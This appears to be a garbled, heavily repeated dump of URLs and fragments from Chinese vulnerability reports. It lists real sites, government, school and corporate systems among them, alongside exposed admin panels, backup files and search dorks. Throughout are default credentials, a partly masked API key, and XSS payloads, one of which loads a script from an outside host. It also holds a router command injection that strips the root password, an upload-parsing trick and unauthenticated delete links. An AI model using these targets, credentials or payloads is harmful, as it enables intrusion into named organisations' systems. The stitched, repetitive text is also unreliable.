http://apabi.hfslib.com/AddMyFavourite.asp?lang=gb&DocID=1 http://211.81.174.133:81/dlib/AddMyFavourite.asp?lang=gb&DocID=1 http://125.36.68.156/ http://125.36.68.161/ http://125.36.68.165/ http://125.36.68.159/ http://125.36.68.144/ http://211.155.227.151/ http://125.36.68.229/ http://125.36.68.149/ http://125.36.68.132/ http://125.36.68.185/ http://125.36.68.156/status_dev_info_t.gch http://125.36.68.156/manager_dev_config_t.gch http://125.36.68.156/manager_log_conf_t.gch http://www.appchina.com/account/retrieve,验证码输入一次即可,用户名存在则OK,用户名不存在则提示无法登陆。 rain:15160899762 http://chong.appchina.com/index.php/ https://ad.toutiao.com/login/ https://ad.toutiao.com/forgot/ www.cpoc.cn http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx 
http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.gzevergrandefc.com/Manage/AdminLogin.aspx http://220.161.148.22:8891/fkoa/login!exit.action http://202.97.155.178/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://mzoa.zsmz.com/OAWeb2/common.action http://202.85.213.23:8081/login.php http://www.mbaschool.com.cn/fenxiao/shenyang/index.html http://fjqdoa.fjgpc.com:9999/fjqdoa/loginAction.action http://www.cnern.org/index.action http://www.cnern.org/getContent.action?id=24662&class_id=29&article_class_id=8 http://mail.tutuapp.com/WebResource.axd?d=PG-vNzrJAe0x8wW9Qe32fQ2 url:http://218.241.144.110:80/manager/html user:tomcat pass:tomcat http://218.241.144.110/wooyun/ http://data.auto.cnfol.com/bseries/photo/1512 http://www.yuanweb.cn http://v.gd10010.cn/vip/index.do?env=wap&cps=RX0427,这个页面有最底下有一个“宽带业务-新装宽带”,洞就在这里了 km2.in/xss.php http://118.194.34.122/ http://118.194.34.122 http://dev.paojiao.cn:8080/ http://os.tjaee.com/admin/login.jsp http://59.55.33.137:8040/mainpage/articleclasslist.aspx?classid=1 http://oa.jxgxedu.gov.cn/mainpage/articleclasslist.aspx?classid=11 http://www.gznoa.com/mainpage/articleclasslist.aspx?classid=1 http://218.87.140.106/mainpage/articleclasslist.aspx?classid=1 
http://59.55.33.137:8010/mainpage/articleclasslist.aspx?classid=1 http://www.ybzhbj.gov.cn/Y01/ws_xw/index.asp http://www.ybxfj.gov.cn/Y01/ws_xw/index.asp http://www.yjbhdl.com/Y01/ws_xw/index.asp http://www.caoxianyy.com/cxyy/Y01/ws_xw/index.asp http://www.ybcyyy.net/cyyy/Y01/ws_xw/index.asp http://yxzy.hrbmu.edu.cn/ http://yxzy.hrbmu.edu.cn/cvpcn/showArt.asp?id=467 www.yiban.cn/user/index/index/user_id/1974385 http://vmi.tclking.com/Default.aspx http://www.galaxywind.com/ https://github.com/yuanzhhh/galaxywind http://59.55.33.137:8040/mainpage/articlefindselect.aspx http://oa.jxgxedu.gov.cn/mainpage/articlefindselect.aspx http://www.gznoa.com/mainpage/articlefindselect.aspx http://218.87.140.106/mainpage/articlefindselect.aspx http://59.55.33.137:8010/mainpage/articlefindselect.aspx http://**.**.**/wooyun/_ http://zwx.eyougame.com/Giftpack http://125.35.15.47/SwapWebService/querySwap.do;jsessionid=FF619D6AC2C986E7213D8B87754392E2 http://yytv.cc/ http://igogo.enavi.189.cn/sys/loginout.do http://igogo.enavi.189.cn/upload/uploadapk.htm http://igogo.enavi.189.cn/sys/mainindex.do http://kjjr.bankcomm.com/dfv/web/index.JSP?id=index%27%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://editor.joyslink.com/config.php.bak http://**.**.**/eedswas/www/eeds/jsp/user_center/user_center.jspsystem=0FCAF188F5A32098FADFF5B5ACA1CB8E_ http://tencent.new.ceping.com/AssessmentInfo/ConformInfo?email=t@qq.com&UserInfo={%22tenantId%22:%22104264%22,%22userId%22:%22105735284%22,%22activityId%22:%22170926%22,%22snId%22:%226353545%22,%22sn%22:%221300077545772%22,%22email%22:%22t@qq.com%22 http://tencent.new.ceping.com/AssessmentInfo/ConformInfo?email=t@qq.com&UserInfo={"tenantId":"104264","userId":"105735284","activityId":"170926","snId":"6353545","sn":"1300077545772","email":"t@qq.com http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx 
http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx android:configChanges="keyboardHidden|navigation|orientation android:hardwareAccelerated="false android:name="com.tencent.server.fore.ComposeSmsActivity android:process=":fore android:windowSoftInputMode="stateHidden|adjustResize android:name="android.intent.action.VIEW android:name="android.intent.category.DEFAULT android:mimeType="vnd.android-dir/mms-sms android:name="android.intent.action.VIEW android:name="android.intent.action.SENDTO android:name="android.intent.category.DEFAULT android:name="android.intent.category.BROWSABLE android:scheme="sms android:scheme="smsto android:name="android.intent.action.SEND android:name="android.intent.category.DEFAULT android:mimeType="text/plain http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://app.gdgs.gov.cn:8888/aicccps/huodong/Support_List.jsp?aicid=440000 http://app.gdgs.gov.cn:8888/aicccps/admin/Support_List.jsp http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_Edit.jsp?newID=396cf401-0128-1000-e000-0000c0a8647e http://app.gdgs.gov.cn:8888/aicccps/admin/Xiehui_List.jsp www.sxgfgb.gov.cn/shownews.asp?id=826 http://www.ot-hs.com/index1.asp 
http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://store.meizu.com/customer_address/remove_submit http://202.117.122.44/dlib/dir.asp?lang=gb&DocID=2660 http://211.81.174.133:81/dlib/dir.asp?lang=gb&DocID=88607 http://210.37.2.181/dlib/dir.asp?lang=gb&DocID=7278 http://qd.wzlib.cn/dlib/dir.asp?lang=gb&DocID=139163 http://202.103.233.136/dlib/dir.asp?lang=gb&DocID=43036 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://115.29.241.184:8080 www2.xiren.com.cn http://127.0.0.1/index.php?s=Admin/Master/Update http://127.0.0.1/index.php?s=Admin/Config/Updatedb http://123.234.41.28/ http://123.234.41.28/3.asp;.jpg http://down.chinaz.com/soft/33525.htm inurl:jsxm_detail.asp?id= http://www.veston-gym.com/jsxm_detail.asp?id=36 http://xyhssadmin.gotoip55.com/jsxm_detail.asp?id=34 http://www.mstjs.com/jsxm_detail.asp?id=31 http://jajs.quxint.com/jsxm_detail.asp?id=35 http://www.junyuetj.com/jsxm_detail.asp?id=51 http://58.218.147.146:8080/ http://down.chinaz.com/soft/34007.htm inurl:view_detail.asp?id= http://www.starking128.com/view_detail.asp?id=78 
http://www.bjssrd.com/view_detail.asp?id=77 http://szdfzz.cn/view_detail.asp?id=69 http://honghuangsj.com/view_detail.asp?id=82 http://www.11nine.net/view_detail.asp?id=67 http://www.xaymad.com/view_detail.asp?id=82 http://wfhr56.com/view_detail.asp?id=58 http://www.beiyute.com/view_detail.asp?id=59 http://nndya.com/view_detail.asp?id=58 http://nycdgg.com/view_detail.asp?id=58 http://pjchla.com/view_detail.asp?id=98 cn:8080 cn:8088 www.crmshwlzx.com http://m.kadang.com/mobile/wap/user/login/page.htm?redirectURL=http://m.kadang.com/mobile/wap/wuliu/entry.htm http://www.kadang.com/index.php?act=cart&op=address&address_id=&consignee=wooyun&areaid=55&city_id=40&area_info=%E5%A4%A9%E6%B4%A5%09%E5%A4%A9%E6%B4%A5%E5%B8%82%09%E5%92%8C%E5%B9%B3%E5%8C%BA&address=wooyun http://58.56.128.82:8080/haier http://58.56.128.82:8080/haier/downloadfile/client.apk http://www.xwgjzx.com:8888/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://www.gxbyzx.cn:88/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://218.78.241.80/anmai/Edis/home_school/mentalityconsultationset.aspx?cz=del&id=1 http://59.40.183.3:8086/ tw:8080 tw:8080 tw:8086 com:8080 http://210.75.206.8 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx 
http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://gw.apabi.com/ http://202.117.24.8/dlib/netlinkhandler.asp?lang=gb&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%C1%D6%C9%BD&Repeatable=True http://210.37.2.181/dlib/netlinkhandler.asp?lang=gb&DocGroupID=24&FieldID=516&FieldName=Creator&FieldType=1&QueryValue=%BA%A3%C4%CF%B0%AE%C0%D6%C5%AE%D7%D3%BA%CF%B3%AA%CD%C5&Repeatable=False http://202.195.177.13/ebook/netlinkhandler.asp?lang=gb&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%BA%AB%CC%A9%C2%D7&Repeatable=True http://202.118.250.140/dlib/netlinkhandler.asp?lang=gb&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%BB%C6%C1%F7%D0%CB%2C+%C5%A3%CA%A4%C0%FB&Repeatable=True http://202.117.122.44/dlib/netlinkhandler.asp?lang=en&DocGroupID=2&FieldID=3&FieldName=Creator&FieldType=1&QueryValue=%C8%CE%D3%F1%CC%EF+...+%5B%B5%C8%5D&Repeatable=1 http://www.jznccq.com/Admin.php/Login.html http://cspro.ccf.org.cn/lead/application/ccf/login.jsp http://ebook.crup.com.cn/search.asp?keywords=%E5%91%A8%E5%9B%BD%E5%B9%B3 http://ebooking.qunar.com/ebPage/login.html http://na2.tjaic.gov.cn/jmx-console/ http://59.173.241.30:8080/ http://59.173.241.30:5678/ http://59.173.241.30:5678/FindCarSystem/ http://59.173.241.30:8090/ImageRecv/whguF_20140903001/KT_ServerSoft/20150321/192.168.50.241/14/ http://120.236.40.117/ http://bbs.bdwsw.zhanchenggame.com http://qzs.qq.com/qzone/qzact/act/hkhd/index.html http://www.xwgjzx.com:8888/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 
http://www.gxbyzx.cn:88/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://218.78.241.80/anmai/Edis/home_school/sudjectdiscussset.aspx?cz=del&id=1 http://www.sxfo.gov.cn/content.aspx?id=1432 http://www.xzqtj.gov.cn/tjnr.asp?id=523 http://www.hcqrs.gov.cn/manage/Admin_Add.aspx http://www.zgws.gov.cn:9090/tm/toLogin.action http://www.shoprobam.com/ http://cdn.wanzhoumo.com,从这个域名访问,php后缀是直接下载不是执行, http://www.rangrang.fm访问马地址就可以成功执行 http://searchmanage.org.hc360.com/ http://miniportal.b2b.hc360.com/marketshield/m/manager/find/)也存在未授权访问漏洞。 http://searchmanage.org.hc360.com/IndexLeft.aspx http://searchmanage.org.hc360.com/User/UserManage.aspx http://miniportal.b2b.hc360.com/marketshield/m/manager/find/ http://120.70.227.17:8080/记得加端口,上面那里不允许加特殊符号没办法 http://123.234.41.28 http://123.234.41.28:80//ashx/check_login.ashx?callback=flightHandler&id=1&_=1426936653601 http://**.**.**/zp/myWorksHome.action_ http://**.**.**/indexzp/queryAllWorks.action_ http://**.**.**/index/index.action_ http://**.**.**/index/xwzxmain.action_ http://**.**.**/zp/verifyList.action_ http://**.**.**/author/albums_alums.action_ http://**.**.**/author/userRegist_registUI.action_ http://**.**.**/user/userCenter_updateInfoUI.action_ http://**.**.**/zp/initAddWorks.action_ http://**.**.**/author/workerDetail.action_ http://**.**.**/index/zxggmain.action_ http://**.**.**/index/xxxsmain.action_ http://**.**.**/index/syhdmain.action_ http://**.**.**/author/userRegist_regist.action_ http://**.**.**/index/syhdDetail.action_ http://**.**.**/author/authorInfo.action_ http://**.**.**/author/authorIndex.action_ http://**.**.**/index/zxggmain.actionchannelId=21_ http://**.**.**/author/authorIndex.actionuserId=1_ http://192.168.11.1/cgi-bin/luci/;stok=换成路由自己的/api/devices/allowConnect?mac=%3Bpasswd%20-d%20root%3B 
http://www.wapsh.net/website/104417/backup/ http://www.wapsh.net/website/104417/backup/backup.sql_v1.sql http://oa.fangdd.com http://oa.fangdd.com/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 http://oa.fangdd.com/login/VerifyLogin.jsp?loginfile=http://%77%77%77%2E%62%61%69%64%75%2E%63%6F%6D http://210.40.132.58/A_Major.php?aid=5&op=About&cop=Major http://210.40.132.58/admin/ http://www.sinobook.com.cn/b2c/scrp/bookzx.cfm?sKeyword=300&sFieldName=pno http://hz.zu.loupan.com/tmp/4517803.html http://60.191.106.46/index.jsp http://www.tcl.com/About/social_detail.html?id=247 http://www.tcl.com/About/huameng_detail.html?id=258 http://shianwang.net/wooyun.txt admin:123456 http://hermes.mail.21cn.com/webmail/)允许用户注册任意用户名邮箱,没有屏蔽高危邮箱,可导致任何人向CA申请DV(域名验证)SSL证书。我干的这个事和前几天芬兰人申请微软live.fi域名是一样的[1]。 http://www.myhack58.com/Article/html/1/4/2015/60064.htm https://technet.microsoft.com/en-us/library/security/3046310.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://gs.njfu.edu.cn/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://211.64.205.214/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 
http://202.203.225.17:8080/Gmis/xw/xwsb_zyxwEdit.aspx?xh=1 http://www.myhack58.com/Article/html/1/4/2015/60064.htm https://technet.microsoft.com/en-us/library/security/3046310.aspx https://www.agwa.name/blog/post/how_to_responsibly_misissue_a_cert http://sss.bnu.edu.cn/viewstaff.php?id=1 http://down.chinaz.com/soft/33525.htm http://xyhssadmin.gotoip55.com/bk_detail.asp?id=58 http://www.mstjs.com/bk_detail.asp?id=64 http://www.junyuetj.com/demo_detail.asp?id=60 http://jajs.quxint.com/demo_detail.asp?id=30 http://www.veston-gym.com/hr_detail.asp?id=16 http://ceoofficer.com/HR_detail.asp?id=1625 http://yhk.wiselong.com:8080/ccbs/ccbs/order/showOrderList.do?method=showOrderDetailJsp&orderId=910835&isStorePage=Y http://moldsale.haier.com/bidadmin/outall.asp?bidID=1 http://moldsale.haier.com/bidadmin/open.asp?id=1 http://moldsale.haier.com/bidadmin/host.asp?id=1 http://moldsale.haier.com/bidadmin/%E5%A4%8D%E4%BB%B6%20outall-ori.asp?bidID=1 http://moldsale.haier.com/bidadmin/%E5%A4%8D%E4%BB%B6%20outall-bad.asp?bidID=1 http://moldsale.haier.com/bidadmin/threepart.asp?bidID=1 http://moldsale.haier.com/bidadmin/outall.asp?bidID=1 http://gs.njfu.edu.cn/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_xlssEdit.aspx?xh=1 http://www.app365.com/common/customer.jhtml http://wzjb.app365.com/site56/CustomerService/feedback.jspx http://ydkd.app365.com/site56/CustomerService/feedback.jspx http://www.yonglibao.com/User/Login http://www.yonglibao.com/User http://www.yonglibao.com/User/Index/paypwd 
http://gs.njfu.edu.cn/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_tdxlssEdit.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_gdxxjsEdit.aspx?xh=1 http://gs.njfu.edu.cn/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://218.75.27.177/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://101.76.99.20/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xwsb_tdxlbsEdit.aspx?xh=1 http://op.bitauto.com/ems/sharepages/mytask.aspx?name= http://op.bitauto.com/ems/SharePages/ProjectList.aspx?state=1&CategoryId=6 http://op.bitauto.com/ems/SharePages/plandutylist.aspx http://op.bitauto.com/ems/sharepages/mytask.aspx?name= http://op.bitauto.com/ems/sharepages/mytask.aspx?name= 
http://op.bitauto.com/ems/sharepages/mytask.aspx?name= http://bidding.ztesoft.com/ http://bidding.ztesoft.com/wordpress/wp-login.php http://gs.njfu.edu.cn/Gmis/xw/xskycgdj.aspx?xh=1 http://202.203.225.17:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://218.75.27.177/Gmis/xw/xskycgdj.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://101.76.99.20/Gmis/xw/xskycgdj.aspx?xh=1 http://61.187.179.68:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://210.43.126.80:8080/Gmis/xw/xskycgdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xskycgdj.aspx?xh=1 http://211.64.205.214/Gmis/xw/xskycgdj.aspx?xh=1 http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8 http://t.cn/RAvVP** http://t.cn/RAvVP** http://218.90.133.218:8099/aIndex.aspx http://www.qzyixiaotong.com/ischool/jsp/article_detail.jsp?articleId=1131 http://www.ztesoft.com/ http://www.ztesoft.com/zsmart/index.php inurl:pubfile.xwl http://www.sfzyzz.cn:6869/file/main?action=webbuilder/application/files/pubfile.xwl http://www.scbss.com/webcontent/main?action=webbuilder/application/files/pubfile.xwl http://zgvtc.com:9999/main?action=webbuilder/application/files/pubfile.xwl http://systems.cdsxdzx.com/file/main?action=webbuilder/application/files/pubfile.xwl http://222.209.208.27:9111/jsxy/main?action=webbuilder/application/files/pubfile.xwl http://117.139.121.134:8088/material/main?action=webbuilder/application/files/pubfile.xwl http://117.139.109.143:8081/main?action=webbuilder/application/files/pubfile.xwl http://118.121.219.7:3312/main?action=webbuilder/application/files/pubfile.xwl http://222.214.237.11:8010/file/main?action=webbuilder/application/files/pubfile.xwl http://218.88.239.59:8088/main?action=webbuilder/application/files/pubfile.xwl http://www.pzhjx.com:8080/main?action=webbuilder/application/files/pubfile.xwl http://www.xbws.com.cn/file/main?action=webbuilder/application/files/pubfile.xwl http://218.89.109.21:8084/myfile/main?action=webbuilder/application/files/pubfile.xwl 
http://bbs.jeecms.com/ http://218.22.88.62:8089/wsba.aspx http://218.22.88.62:8089/login.aspx http://3c.ecare365.com/ChinaUnicom/Order/Defau http://sms.finereason.com/ http://sms.finereason.com/member/ComSms.asp?tid=1 http://isub.snssdk.com/2/wap/activity/?iid=3309574191&ac=WIFI&channel=App%20Store&app_name=news_article&aid=13&version_code=4.4.4&device_platform=iphone&os_version=7.1.2&device_type=iPhone%205S&vid=8EAA61E1-82A1-4974-8FFE-A3CFFCC97491&openudid=9b907b2e3f957f7c4959a77d9e643fbc22dece64&idfa=1528E03C-0998-4F63-BDB2-1D0F26D4F81F http://isub.snssdk.com/2/wap/activity/admin/ http://x.189.cn:80/kefuwap/broadbandWarning/warningWap.html http://www.gtggjy.com/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.qfztb.gov.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.zjhnztb.com/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.jszbw.com/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.smztb.com.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.jsspzx.gov.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.jxedzsp.gov.cn/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://122.226.154.126/TSPB/pub_news/Pub_News_InfoViewBeanCTRL http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemView/ItemFifth.aspx?id=1 http://222.135.76.147:8200/symItemView/ItemFifth.aspx?id=1 http://222.135.127.190:7200/symItemView/ItemFifth.aspx?id=1 http://221.2.149.47:8200/symItemView/ItemFifth.aspx?id=1 http://218.59.205.41:8053/symItemView/ItemFifth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemView/ItemFifth.aspx?id=1 http://221.2.171.59:8200/symItemView/ItemFifth.aspx?id=1 http://218.56.159.98:8001/symItemView/ItemFifth.aspx?id=1 http://123.134.189.60:8016/symItemView/ItemFifth.aspx?id=1 http://www.beijing.gov.cn/zhuanti/bjfwn/# http://182.92.82.101/signin http://s.weibo.com/weibo/%22%3E%3Cimg%20src=1%20onerror=appendChild%28createElement%28%27script%27%29%29.src=%27http://t.cn/RAZVK0X%27;%3E%3C/img%3E?topnav=1&wvr=6&b=1 www.muzhiwan.com http://www.muzhiwan.com 
http://xyz.51job.com/External/Personal/MailReply.aspx?ID=be9a821a-bbb7-4b95-a8dd-04d0ee4455a3&DBID=0975812c-a8ab-4af6-911c-41db25672c90&InboxID=4bd0ff82-8324-41b7-955e-7349a6b4e5b3 http://bbs.union.ijinshan.com/admin.php uckey:Y3W8f8R255I63326J0Pfk3b6s43*******gfv5vd60n0jcq1u7Q2P1N6U6i5 http://117.79.80.22:8082/ http://117.79.80.22:8082/admin-console/login.seam?conversationId=61 http://117.79.80.22:8082/c/index.jsp encap:Ethernet d8:b7:1d:e4 addr:10.8.8.177 Bcast:10.8.8.255 Mask:255.255.255.0 d8ff:feb7:1de4/64 Scope:Link MTU:1500 packets:85872315 packets:37111314 txqueuelen:1000 http://www3.53kf.com/zdy_dbgg2.php?style_id=103458019&company_id=62748324&dbgg_type=2 http://www22.53kf.com/zdy_dbgg2.php?style_id=103766842&company_id=70818335&dbgg_type=2 http://www17.53kf.com/zdy_dbgg2.php?style_id=106052692&company_id=72028138&dbgg_type=2 http://www1.53kf.com/zdy_dbgg2.php?style_id=106080667&company_id=72052732&dbgg_type=2 http://www7.53kf.com/zdy_dbgg2.php?style_id=106081192&company_id=72049384&dbgg_type=2 http://www5.53kf.com/zdy_dbgg2.php?style_id=103534676&company_id=63041455&dbgg_type=1 http://www4.53kf.com/zdy_dbgg2.php?style_id=103610211&company_id=70401575&dbgg_type=2 